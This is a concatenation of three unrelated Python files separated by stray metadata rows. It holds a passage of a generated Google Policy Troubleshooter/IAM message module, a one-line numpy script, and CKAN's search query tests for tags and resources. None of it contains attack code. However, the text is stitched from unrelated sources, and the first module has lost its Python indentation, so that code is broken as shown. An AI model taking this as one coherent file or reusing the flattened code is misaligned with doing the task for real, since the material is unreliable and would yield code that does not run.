HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
class RolePermissionRelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of the permission's existence, or nonexistence, in the
role to the overall determination for the entire policy.
Values:
HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
class RolePermissionValueValuesEnum(_messages.Enum):
r"""Indicates whether the role granted by this binding contains the
specified permission.
Values:
ROLE_PERMISSION_UNSPECIFIED: Reserved for future use.
ROLE_PERMISSION_INCLUDED: The permission is included in the role.
ROLE_PERMISSION_NOT_INCLUDED: The permission is not included in the
role.
ROLE_PERMISSION_UNKNOWN_INFO_DENIED: The sender of the request is not
allowed to access the binding.
"""
ROLE_PERMISSION_UNSPECIFIED = 0
ROLE_PERMISSION_INCLUDED = 1
ROLE_PERMISSION_NOT_INCLUDED = 2
ROLE_PERMISSION_UNKNOWN_INFO_DENIED = 3
@encoding.MapUnrecognizedFields('additionalProperties')
class MembershipsValue(_messages.Message):
r"""Indicates whether each member in the binding includes the member
specified in the request, either directly or indirectly. Each key
identifies a member in the binding, and each value indicates whether the
member in the binding includes the member in the request. For example,
suppose that a binding includes the following members: *
`user:<EMAIL>` * `group:<EMAIL>` You want to
troubleshoot access for `user:<EMAIL>`. This user is a member of
the group `group:<EMAIL>`. For the first member in the
binding, the key is `user:<EMAIL>`, and the `membership` field
in the value is set to `MEMBERSHIP_NOT_INCLUDED`. For the second member in
the binding, the key is `group:<EMAIL>`, and the
`membership` field in the value is set to `MEMBERSHIP_INCLUDED`.
Messages:
AdditionalProperty: An additional property for a MembershipsValue
object.
Fields:
additionalProperties: Additional properties of type MembershipsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MembershipsValue object.
Fields:
key: Name of the additional property.
value: A GoogleCloudPolicytroubleshooterV1betaBindingExplanationAnnota
tedMembership attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaBindingExplanationAnnotatedMembership', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
access = _messages.EnumField('AccessValueValuesEnum', 1)
condition = _messages.MessageField('GoogleTypeExpr', 2)
memberships = _messages.MessageField('MembershipsValue', 3)
relevance = _messages.EnumField('RelevanceValueValuesEnum', 4)
role = _messages.StringField(5)
rolePermission = _messages.EnumField('RolePermissionValueValuesEnum', 6)
rolePermissionRelevance = _messages.EnumField('RolePermissionRelevanceValueValuesEnum', 7)
class GoogleCloudPolicytroubleshooterV1betaBindingExplanationAnnotatedMembership(_messages.Message):
r"""Details about whether the binding includes the member.
Enums:
MembershipValueValuesEnum: Indicates whether the binding includes the
member.
RelevanceValueValuesEnum: The relevance of the member's status to the
overall determination for the binding.
Fields:
membership: Indicates whether the binding includes the member.
relevance: The relevance of the member's status to the overall
determination for the binding.
"""
class MembershipValueValuesEnum(_messages.Enum):
r"""Indicates whether the binding includes the member.
Values:
MEMBERSHIP_UNSPECIFIED: Reserved for future use.
MEMBERSHIP_INCLUDED: The binding includes the member. The member can be
included directly or indirectly. For example: * A member is included
directly if that member is listed in the binding. * A member is
included indirectly if that member is in a Google group or G Suite
domain that is listed in the binding.
MEMBERSHIP_NOT_INCLUDED: The binding does not include the member.
MEMBERSHIP_UNKNOWN_INFO_DENIED: The sender of the request is not allowed
to access the binding.
MEMBERSHIP_UNKNOWN_UNSUPPORTED: The member is an unsupported type. Only
Google Accounts and service accounts are supported.
"""
MEMBERSHIP_UNSPECIFIED = 0
MEMBERSHIP_INCLUDED = 1
MEMBERSHIP_NOT_INCLUDED = 2
MEMBERSHIP_UNKNOWN_INFO_DENIED = 3
MEMBERSHIP_UNKNOWN_UNSUPPORTED = 4
class RelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of the member's status to the overall determination for
the binding.
Values:
HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
membership = _messages.EnumField('MembershipValueValuesEnum', 1)
relevance = _messages.EnumField('RelevanceValueValuesEnum', 2)
class GoogleCloudPolicytroubleshooterV1betaExplainedPolicy(_messages.Message):
r"""Details about how a specific IAM Policy contributed to the access check.
Enums:
AccessValueValuesEnum: Indicates whether _this policy_ provides the
specified permission to the specified member for the specified resource.
This field does _not_ indicate whether the member actually has the
permission for the resource. There might be another policy that
overrides this policy. To determine whether the member actually has the
permission, use the `access` field in the TroubleshootIamPolicyResponse.
RelevanceValueValuesEnum: The relevance of this policy to the overall
determination in the TroubleshootIamPolicyResponse. If the sender of the
request does not have access to the policy, this field is omitted.
Fields:
access: Indicates whether _this policy_ provides the specified permission
to the specified member for the specified resource. This field does
_not_ indicate whether the member actually has the permission for the
resource. There might be another policy that overrides this policy. To
determine whether the member actually has the permission, use the
`access` field in the TroubleshootIamPolicyResponse.
bindingExplanations: Details about how each binding in the policy affects
the member's ability, or inability, to use the permission for the
resource. If the sender of the request does not have access to the
policy, this field is omitted.
fullResourceName: The full resource name that identifies the resource. For
example, `//compute.googleapis.com/projects/my-project/zones/us-
central1-a/instances/my-instance`. If the sender of the request does not
have access to the policy, this field is omitted. For examples of full
resource names for Google Cloud services, see
https://cloud.google.com/iam/help/troubleshooter/full-resource-names.
policy: The IAM policy attached to the resource. If the sender of the
request does not have access to the policy, this field is empty.
relevance: The relevance of this policy to the overall determination in
the TroubleshootIamPolicyResponse. If the sender of the request does not
have access to the policy, this field is omitted.
"""
class AccessValueValuesEnum(_messages.Enum):
r"""Indicates whether _this policy_ provides the specified permission to
the specified member for the specified resource. This field does _not_
indicate whether the member actually has the permission for the resource.
There might be another policy that overrides this policy. To determine
whether the member actually has the permission, use the `access` field in
the TroubleshootIamPolicyResponse.
Values:
ACCESS_STATE_UNSPECIFIED: Reserved for future use.
GRANTED: The member has the permission.
NOT_GRANTED: The member does not have the permission.
UNKNOWN_CONDITIONAL: The member has the permission only if a condition
expression evaluates to `true`.
UNKNOWN_INFO_DENIED: The sender of the request does not have access to
all of the policies that Policy Troubleshooter needs to evaluate.
"""
ACCESS_STATE_UNSPECIFIED = 0
GRANTED = 1
NOT_GRANTED = 2
UNKNOWN_CONDITIONAL = 3
UNKNOWN_INFO_DENIED = 4
class RelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of this policy to the overall determination in the
TroubleshootIamPolicyResponse. If the sender of the request does not have
access to the policy, this field is omitted.
Values:
HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
access = _messages.EnumField('AccessValueValuesEnum', 1)
bindingExplanations = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaBindingExplanation', 2, repeated=True)
fullResourceName = _messages.StringField(3)
policy = _messages.MessageField('GoogleIamV1Policy', 4)
relevance = _messages.EnumField('RelevanceValueValuesEnum', 5)
class GoogleCloudPolicytroubleshooterV1betaTroubleshootIamPolicyRequest(_messages.Message):
r"""Request for TroubleshootIamPolicy.
Fields:
accessTuple: The information to use for checking whether a member has a
permission for a resource.
"""
accessTuple = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaAccessTuple', 1)
class GoogleCloudPolicytroubleshooterV1betaTroubleshootIamPolicyResponse(_messages.Message):
r"""Response for TroubleshootIamPolicy.
Enums:
AccessValueValuesEnum: Indicates whether the member has the specified
permission for the specified resource, based on evaluating all of the
applicable policies.
Fields:
access: Indicates whether the member has the specified permission for the
specified resource, based on evaluating all of the applicable policies.
explainedPolicies: List of IAM policies that were evaluated to check the
member's permissions, with annotations to indicate how each policy
contributed to the final result. The list of policies can include the
policy for the resource itself. It can also include policies that are
inherited from higher levels of the resource hierarchy, including the
organization, the folder, and the project. To learn more about the
resource hierarchy, see https://cloud.google.com/iam/help/resource-
hierarchy.
"""
class AccessValueValuesEnum(_messages.Enum):
r"""Indicates whether the member has the specified permission for the
specified resource, based on evaluating all of the applicable policies.
Values:
ACCESS_STATE_UNSPECIFIED: Reserved for future use.
GRANTED: The member has the permission.
NOT_GRANTED: The member does not have the permission.
UNKNOWN_CONDITIONAL: The member has the permission only if a condition
expression evaluates to `true`.
UNKNOWN_INFO_DENIED: The sender of the request does not have access to
all of the policies that Policy Troubleshooter needs to evaluate.
"""
ACCESS_STATE_UNSPECIFIED = 0
GRANTED = 1
NOT_GRANTED = 2
UNKNOWN_CONDITIONAL = 3
UNKNOWN_INFO_DENIED = 4
access = _messages.EnumField('AccessValueValuesEnum', 1)
explainedPolicies = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaExplainedPolicy', 2, repeated=True)
class GoogleIamV1AuditConfig(_messages.Message):
r"""Specifies the audit configuration for a service. The configuration
determines which permission types are logged, and what identities, if any,
are exempted from logging. An AuditConfig must have one or more
AuditLogConfigs. If there are AuditConfigs for both `allServices` and a
specific service, the union of the two AuditConfigs is used for that
service: the log_types specified in each AuditConfig are enabled, and the
exempted_members in each AuditLogConfig are exempted. Example Policy with
multiple AuditConfigs: { "audit_configs": [ { "service": "allServices",
"audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [
"user:<EMAIL>" ] }, { "log_type": "DATA_WRITE" }, { "log_type":
"ADMIN_READ" } ] }, { "service": "sampleservice.googleapis.com",
"audit_log_configs": [ { "log_type": "DATA_READ" }, { "log_type":
"DATA_WRITE", "exempted_members": [ "user:<EMAIL>" ] } ] } ] } For
sampleservice, this policy enables DATA_READ, DATA_WRITE and ADMIN_READ
logging. It also exempts <EMAIL> from DATA_READ logging, and
<EMAIL> from DATA_WRITE logging.
Fields:
auditLogConfigs: The configuration for logging of each type of permission.
service: Specifies a service that will be enabled for audit logging. For
example, `storage.googleapis.com`, `cloudsql.googleapis.com`.
`allServices` is a special value that covers all services.
"""
auditLogConfigs = _messages.MessageField('GoogleIamV1AuditLogConfig', 1, repeated=True)
service = _messages.StringField(2)
class GoogleIamV1AuditLogConfig(_messages.Message):
r"""Provides the configuration for logging a type of permissions. Example: {
"audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [
"user:<EMAIL>" ] }, { "log_type": "DATA_WRITE" } ] } This enables
'DATA_READ' and 'DATA_WRITE' logging, while exempting <EMAIL> from
DATA_READ logging.
Enums:
LogTypeValueValuesEnum: The log type that this config enables.
Fields:
exemptedMembers: Specifies the identities that do not cause logging for
this type of permission. Follows the same format of Binding.members.
logType: The log type that this config enables.
"""
class LogTypeValueValuesEnum(_messages.Enum):
r"""The log type that this config enables.
Values:
LOG_TYPE_UNSPECIFIED: Default case. Should never be this.
ADMIN_READ: Admin reads. Example: CloudIAM getIamPolicy
DATA_WRITE: Data writes. Example: CloudSQL Users create
DATA_READ: Data reads. Example: CloudSQL Users list
"""
LOG_TYPE_UNSPECIFIED = 0
ADMIN_READ = 1
DATA_WRITE = 2
DATA_READ = 3
exemptedMembers = _messages.StringField(1, repeated=True)
logType = _messages.EnumField('LogTypeValueValuesEnum', 2)
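# Illustrative sketch (not part of the generated module) mirroring the JSON
# example in the AuditLogConfig docstring above; the exempted member is a
# made-up placeholder:
#
#   GoogleIamV1AuditConfig(
#       service='allServices',
#       auditLogConfigs=[
#           GoogleIamV1AuditLogConfig(
#               logType=GoogleIamV1AuditLogConfig.LogTypeValueValuesEnum.DATA_READ,
#               exemptedMembers=['user:jose@example.com'],
#           ),
#       ],
#   )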
class GoogleIamV1Binding(_messages.Message):
r"""Associates `members`, or principals, with a `role`.
Fields:
condition: The condition that is associated with this binding. If the
condition evaluates to `true`, then this binding applies to the current
request. If the condition evaluates to `false`, then this binding does
not apply to the current request. However, a different role binding
might grant the same role to one or more of the principals in this
binding. To learn which resources support conditions in their IAM
policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies).
members: Specifies the principals requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet; with
or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example, `<EMAIL>` .
* `serviceAccount:{emailid}`: An email address that represents a service
account. For example, `<EMAIL>`. *
`group:{emailid}`: An email address that represents a Google group. For
example, `<EMAIL>`. *
`deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique
identifier) representing a user that has been recently deleted. For
example, `<EMAIL>?uid=123456789012345678901`. If the user is
recovered, this value reverts to `user:{emailid}` and the recovered user
retains the role in the binding. *
`deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address
(plus unique identifier) representing a service account that has been
recently deleted. For example, `my-other-
<EMAIL>?uid=123456789012345678901`. If the
service account is undeleted, this value reverts to
`serviceAccount:{emailid}` and the undeleted service account retains the
role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An
email address (plus unique identifier) representing a Google group that
has been recently deleted. For example,
`<EMAIL>?uid=123456789012345678901`. If the group is
recovered, this value reverts to `group:{emailid}` and the recovered
group retains the role in the binding. * `domain:{domain}`: The G Suite
domain (primary) that represents all the users of that domain. For
example, `google.com` or `example.com`.
role: Role that is assigned to the list of `members`, or principals. For
example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
condition = _messages.MessageField('GoogleTypeExpr', 1)
members = _messages.StringField(2, repeated=True)
role = _messages.StringField(3)
class GoogleIamV1Policy(_messages.Message):
r"""An Identity and Access Management (IAM) policy, which specifies access
controls for Google Cloud resources. A `Policy` is a collection of
`bindings`. A `binding` binds one or more `members`, or principals, to a
single `role`. Principals can be user accounts, service accounts, Google
groups, and domains (such as G Suite). A `role` is a named list of
permissions; each `role` can be an IAM predefined role or a user-created
custom role. For some types of Google Cloud resources, a `binding` can also
specify a `condition`, which is a logical expression that allows access to a
resource only if the expression evaluates to `true`. A condition can add
constraints based on attributes of the request, the resource, or both. To
learn which resources support conditions in their IAM policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies). **JSON example:** { "bindings": [ { "role":
"roles/resourcemanager.organizationAdmin", "members": [
"user:<EMAIL>", "group:<EMAIL>", "domain:google.com",
"serviceAccount:<EMAIL>" ] }, { "role":
"roles/resourcemanager.organizationViewer", "members": [
"user:<EMAIL>" ], "condition": { "title": "expirable access",
"description": "Does not grant access after Sep 2020", "expression":
"request.time < timestamp('2020-10-01T00:00:00.000Z')", } } ], "etag":
"BwWWja0YfJA=", "version": 3 } **YAML example:** bindings: - members: -
user:<EMAIL> - group:<EMAIL> - domain:google.com -
serviceAccount:<EMAIL> role:
roles/resourcemanager.organizationAdmin - members: - user:<EMAIL>
role: roles/resourcemanager.organizationViewer condition: title: expirable
access description: Does not grant access after Sep 2020 expression:
request.time < timestamp('2020-10-01T00:00:00.000Z') etag: BwWWja0YfJA=
version: 3 For a description of IAM and its features, see the [IAM
documentation](https://cloud.google.com/iam/docs/).
Fields:
auditConfigs: Specifies cloud audit logging configuration for this policy.
bindings: Associates a list of `members`, or principals, with a `role`.
Optionally, may specify a `condition` that determines how and when the
`bindings` are applied. Each of the `bindings` must contain at least one
principal. The `bindings` in a `Policy` can refer to up to 1,500
principals; up to 250 of these principals can be Google groups. Each
occurrence of a principal counts towards these limits. For example, if
the `bindings` grant 50 different roles to `user:<EMAIL>`, and
not to any other principal, then you can add another 1,450 principals to
the `bindings` in the `Policy`.
etag: `etag` is used for optimistic concurrency control as a way to help
prevent simultaneous updates of a policy from overwriting each other. It
is strongly suggested that systems make use of the `etag` in the read-
modify-write cycle to perform policy updates in order to avoid race
conditions: An `etag` is returned in the response to `getIamPolicy`, and
systems are expected to put that etag in the request to `setIamPolicy`
to ensure that their change will be applied to the same version of the
policy. **Important:** If you use IAM Conditions, you must include the
`etag` field whenever you call `setIamPolicy`. If you omit this field,
then IAM allows you to overwrite a version `3` policy with a version `1`
policy, and all of the conditions in the version `3` policy are lost.
version: Specifies the format of the policy. Valid values are `0`, `1`,
and `3`. Requests that specify an invalid value are rejected. Any
operation that affects conditional role bindings must specify version
`3`. This requirement applies to the following operations: * Getting a
policy that includes a conditional role binding * Adding a conditional
role binding to a policy * Changing a conditional role binding in a
policy * Removing any role binding, with or without a condition, from a
policy that includes conditions **Important:** If you use IAM
Conditions, you must include the `etag` field whenever you call
`setIamPolicy`. If you omit this field, then IAM allows you to overwrite
a version `3` policy with a version `1` policy, and all of the
conditions in the version `3` policy are lost. If a policy does not
include any conditions, operations on that policy may specify any valid
version or leave the field unset. To learn which resources support
conditions in their IAM policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies).
"""
auditConfigs = _messages.MessageField('GoogleIamV1AuditConfig', 1, repeated=True)
bindings = _messages.MessageField('GoogleIamV1Binding', 2, repeated=True)
etag = _messages.BytesField(3)
version = _messages.IntegerField(4, variant=_messages.Variant.INT32)
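# Read-modify-write sketch for the etag-based optimistic concurrency described
# in the `etag` field docs above (illustrative only; `client` stands for a
# hypothetical IAM client object, not an API defined in this module):
#
#   policy = client.getIamPolicy(resource)   # response carries the etag
#   policy.bindings.append(new_binding)      # local modification
#   client.setIamPolicy(resource, policy)    # echoing the etag back makes the
#                                            # call fail if the policy changed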
class GoogleTypeExpr(_messages.Message):
r"""Represents a textual expression in the Common Expression Language (CEL)
syntax. CEL is a C-like expression language. The syntax and semantics of CEL
are documented at https://github.com/google/cel-spec. Example (Comparison):
title: "Summary size limit" description: "Determines if a summary is less
than 100 chars" expression: "document.summary.size() < 100" Example
(Equality): title: "Requestor is owner" description: "Determines if
requestor is the document owner" expression: "document.owner ==
request.auth.claims.email" Example (Logic): title: "Public documents"
description: "Determine whether the document should be publicly visible"
expression: "document.type != 'private' && document.type != 'internal'"
Example (Data Manipulation): title: "Notification string" description:
"Create a notification string with a timestamp." expression: "'New message
received at ' + string(document.create_time)" The exact variables and
functions that may be referenced within an expression are determined by the
service that evaluates it. See the service documentation for additional
information.
Fields:
description: Optional. Description of the expression. This is a longer
text which describes the expression, e.g. when hovered over it in a UI.
expression: Textual representation of an expression in Common Expression
Language syntax.
location: Optional. String indicating the location of the expression for
error reporting, e.g. a file name and a position in the file.
title: Optional. Title for the expression, i.e. a short string describing
its purpose. This can be used e.g. in UIs which allow to enter the
expression.
"""
description = _messages.StringField(1)
expression = _messages.StringField(2)
location = _messages.StringField(3)
title = _messages.StringField(4)
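# Illustrative sketch (not part of the generated module): the first CEL
# example from the docstring above, expressed as a GoogleTypeExpr message:
#
#   GoogleTypeExpr(
#       title='Summary size limit',
#       description='Determines if a summary is less than 100 chars',
#       expression='document.summary.size() < 100',
#   )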
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
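if __name__ == '__main__':
    # Illustrative sketch only (not part of the generated API surface):
    # apitools message classes accept their fields as keyword arguments,
    # mirroring the JSON example in the GoogleIamV1Policy docstring above.
    # The email address is a made-up placeholder.
    _binding = GoogleIamV1Binding(
        role='roles/resourcemanager.organizationViewer',
        members=['user:eve@example.com'],
        condition=GoogleTypeExpr(
            title='expirable access',
            expression="request.time < timestamp('2020-10-01T00:00:00.000Z')",
        ),
    )
    _policy = GoogleIamV1Policy(bindings=[_binding], version=3)
    print(encoding.MessageToJson(_policy))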
| 2 | 2 |
test/01.py | vkpedia/test1 | 0 | 12770037 | <filename>test/01.py
import numpy as np
print(np.ones(10)) | 1.34375 | 1 |
ckan/tests/lib/search/test_query.py | gg2/ckan | 1 | 12770038 | # -*- coding: utf-8 -*-
import pytest
import ckan.model as model
import ckan.lib.search as search
import ckan.tests.factories as factories
from ckan.lib.create_test_data import CreateTestData
@pytest.mark.usefixtures("clean_db", "clean_index")
class TestTagQuery(object):
def create_test_data(self):
factories.Dataset(tags=[{"name": "russian"}, {"name": "tolstoy"}])
factories.Dataset(tags=[{"name": "Flexible \u30a1"}])
def test_good_search_query(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=u"ru")
assert result["count"] == 1, result
assert "russian" in result["results"]
result = search.query_for(model.Tag).run(query=u"s")
assert result["count"] == 2, result
assert "russian" in result["results"]
assert "tolstoy" in result["results"]
def test_good_search_queries(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=[u"ru", u"s"])
assert result["count"] == 1, result
assert "russian" in result["results"], result
def test_bad_search_query(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=u"asdf")
assert result["count"] == 0, result
    def test_search_with_capital_letter_in_tagname(self):
        """
        Asserts that it doesn't matter if the tagname has capital letters in it.
        """
        self.create_test_data()
        result = search.query_for(model.Tag).run(query=u"lexible")
        assert u"Flexible \u30a1" in result["results"]
    def test_search_with_capital_letter_in_search_query(self):
        """
        Asserts that search works with a capital letter in the search query.
        """
        self.create_test_data()
        result = search.query_for(model.Tag).run(query=u"Flexible")
        assert u"Flexible \u30a1" in result["results"]
    def test_search_with_unicode_in_search_query(self):
        """
        Asserts that search works with a unicode character above \u00ff.
        """
        self.create_test_data()
        result = search.query_for(model.Tag).run(query=u" \u30a1")
        assert u"Flexible \u30a1" in result["results"]
def test_search_is_case_insensitive(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=u"flexible")
assert u"Flexible \u30a1" in result["results"]
def test_good_search_fields(self):
self.create_test_data()
result = search.query_for(model.Tag).run(fields={"tags": u"ru"})
assert result["count"] == 1, result
assert "russian" in result["results"], result
result = search.query_for(model.Tag).run(fields={"tags": u"s"})
assert result["count"] == 2, result
assert "russian" in result["results"], result
assert "tolstoy" in result["results"], result
def test_bad_search_fields(self):
self.create_test_data()
result = search.query_for(model.Tag).run(fields={"tags": u"asdf"})
assert result["count"] == 0, result
@pytest.fixture
def resources_for_search():
pkg1 = factories.Dataset(name="pkg1")
pkg2 = factories.Dataset()
factories.Resource(
url=TestResourceQuery.ab,
description="This is site ab.",
alt_url="alt_1",
format="Excel spreadsheet",
hash="xyz-123",
package_id=pkg1["id"],
)
factories.Resource(
url=TestResourceQuery.cd,
description="This is site cd.",
alt_url="alt_2",
format="Office spreadsheet",
hash="qwe-456",
package_id=pkg1["id"],
)
factories.Resource(
url=TestResourceQuery.cd,
description="This is site cd.",
alt_url="alt_1",
package_id=pkg2["id"],
)
factories.Resource(
url=TestResourceQuery.ef, description="This is site ef.", package_id=pkg2["id"]
)
factories.Resource(
url=TestResourceQuery.ef, description="This is site gh.", package_id=pkg2["id"]
)
factories.Resource(
url=TestResourceQuery.ef, description="This is site ij.", package_id=pkg2["id"]
)
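# Note: pkg2 deliberately gets three resources with the same URL (`ef`) but
# different descriptions, so URL-based result *sets* collapse to three URLs
# while raw counts still reflect all six resources (see test_search_url).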
@pytest.mark.usefixtures("clean_db", "clean_index", "resources_for_search")
class TestResourceQuery(object):
ab = "http://site.com/a/b.txt"
cd = "http://site.com/c/d.txt"
ef = "http://site.com/e/f.txt"
    def res_search(self, query="", fields=None, terms=None, options=None):
        # Avoid mutable default arguments; fall back to fresh objects per call.
        result = search.query_for(model.Resource).run(
            query=query,
            fields=fields if fields is not None else {},
            terms=terms if terms is not None else [],
            options=options if options is not None else search.QueryOptions(),
        )
        resources = [
            model.Session.query(model.Resource).get(resource_id)
            for resource_id in result["results"]
        ]
        urls = set([resource.url for resource in resources])
        return urls
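    # Example: res_search(fields={"url": "a/b"}) returns {self.ab}, i.e. the
    # set of URLs of the matching resources (see test_search_url_2 below).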
def test_search_url(self):
fields = {"url": "site.com"}
result = search.query_for(model.Resource).run(fields=fields)
assert result["count"] == 6
resources = [
model.Session.query(model.Resource).get(resource_id)
for resource_id in result["results"]
]
urls = set([resource.url for resource in resources])
assert set([self.ab, self.cd, self.ef]) == urls
def test_search_url_2(self):
urls = self.res_search(fields={"url": "a/b"})
assert set([self.ab]) == urls, urls
def test_search_url_multiple_words(self):
fields = {"url": "e f"}
urls = self.res_search(fields=fields)
assert {self.ef} == urls
def test_search_url_none(self):
urls = self.res_search(fields={"url": "nothing"})
assert set() == urls, urls
def test_search_description(self):
urls = self.res_search(fields={"description": "cd"})
assert set([self.cd]) == urls, urls
def test_search_format(self):
urls = self.res_search(fields={"format": "excel"})
assert set([self.ab]) == urls, urls
def test_search_format_2(self):
urls = self.res_search(fields={"format": "sheet"})
assert set([self.ab, self.cd]) == urls, urls
def test_search_hash_complete(self):
urls = self.res_search(fields={"hash": "xyz-123"})
assert set([self.ab]) == urls, urls
def test_search_hash_partial(self):
urls = self.res_search(fields={"hash": "xyz"})
assert set([self.ab]) == urls, urls
def test_search_hash_partial_but_not_initial(self):
urls = self.res_search(fields={"hash": "123"})
assert set() == urls, urls
def test_search_several_fields(self):
urls = self.res_search(fields={"description": "ab", "format": "sheet"})
assert set([self.ab]) == urls, urls
def test_search_all_fields(self):
fields = {"url": "a/b"}
options = search.QueryOptions(all_fields=True)
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
assert result["count"] == 1, result
res_dict = result["results"][0]
assert isinstance(res_dict, dict)
res_keys = set(res_dict.keys())
expected_res_keys = set(model.Resource.get_columns())
expected_res_keys.update(
["id", "package_id", "position"]
)
assert res_keys == expected_res_keys
pkg1 = model.Package.by_name(u"pkg1")
ab = [r for r in pkg1.resources if r.url == self.ab][0]
assert res_dict["id"] == ab.id
assert res_dict["package_id"] == pkg1.id
assert res_dict["url"] == ab.url
assert res_dict["description"] == ab.description
assert res_dict["format"] == ab.format
assert res_dict["hash"] == ab.hash
assert res_dict["position"] == 0
def test_pagination(self):
# large search
options = search.QueryOptions(order_by="id")
fields = {"url": "site"}
all_results = search.query_for(model.Resource).run(
fields=fields, options=options
)
all_resources = all_results["results"]
all_resource_count = all_results["count"]
assert all_resource_count >= 6, all_results
# limit
options = search.QueryOptions(order_by="id")
options.limit = 2
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
resources = result["results"]
count = result["count"]
assert len(resources) == 2, resources
assert count == all_resource_count, (count, all_resource_count)
assert resources == all_resources[:2], "%r, %r" % (
resources,
all_resources,
)
# offset
options = search.QueryOptions(order_by="id")
options.limit = 2
options.offset = 2
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
resources = result["results"]
assert len(resources) == 2, resources
assert resources == all_resources[2:4]
# larger offset
options = search.QueryOptions(order_by="id")
options.limit = 2
options.offset = 4
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
resources = result["results"]
assert len(resources) == 2, resources
assert resources == all_resources[4:6]
def test_extra_info(self):
fields = {"alt_url": "alt_1"}
result = search.query_for(model.Resource).run(fields=fields)
assert result["count"] == 2, result
fields = {"alt_url": "alt_2"}
result = search.query_for(model.Resource).run(fields=fields)
assert result["count"] == 1, result
def test_convert_legacy_params_to_solr():
convert = search.convert_legacy_parameters_to_solr
assert convert({"title": "bob"}) == {"q": "title:bob"}
assert convert({"title": "bob", "fl": "name"}) == {
"q": "title:bob",
"fl": "name",
}
assert convert({"title": "<NAME>ins"}) == {
"q": 'title:"bob perkins"'
}
assert convert({"q": "high+wages"}) == {"q": "high wages"}
assert convert({"q": "high+wages summary"}) == {
"q": "high wages summary"
}
assert convert({"title": "high+wages"}) == {"q": 'title:"high wages"'}
assert convert({"title": "bob", "all_fields": 1}) == {
"q": "title:bob",
"fl": "*",
}
with pytest.raises(search.SearchError):
convert({"title": "bob", "all_fields": "non-boolean"})
